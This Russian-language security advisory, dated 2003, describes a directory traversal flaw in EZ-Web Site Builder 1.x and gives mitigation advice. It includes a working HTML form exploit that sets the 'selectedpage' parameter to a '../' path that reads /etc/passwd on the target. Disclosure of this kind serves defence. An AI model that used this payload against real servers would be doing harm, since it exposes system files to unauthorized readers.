Security Lab

Доступ к произвольным файлам на системе в EZ-Web Site Builder

Дата публикации:05.09.2003
Всего просмотров:1057
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Раскрытие важных данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: EZ-Web Site Builder 1.x

Уязвимые версии: EZ-Web Site Builder 1.x

Описание: Уязвимость обнаружена в EZ-Web Site Builder. Удаленный пользователь может получить доступ к произвольным файлам на уязвимом сервере.

Программа должным образом не обрабатывает параметр "selectedpage" перед открытием файла, используя встроенный редактор. В результате удаленный пользователь может представить специально обработанное значение для параметра "selectedpage", чтобы получить доступ к файлам, расположенным вне wwwroot каталога.

Пример/Эксплоит:

<html><body><p><center>
<b>Mein 31337 Exploit :-P</b><br>
<form action="http://targethost.com/cgi-bin/sbcgi/sitebuilder.cgi" 
method=POST>
<input type="hidden" name="username" value="targetuser">
<input type="hidden" name="password" value="targetpassword">
<input type="hidden" name="selectedpage" 
value="../../../../../../../../../../etc/passwd">
<p><input type="submit" name="action" value="Yes - Use Advanced Edi
tor">
<p><input type="submit" value="Return to Site Builder">
</form>
</center></body></html>

URL производителя: http://newerascripts.com/

Решение:

Ограничьте доступ к сайту доверенным пользователям. Отредактируйте исходный код, чтобы фильтровались злонамеренные символы. Используйте альтернативное программное обеспечение.
Ссылки: Directory Traversal in SITEBUILDER - v1.4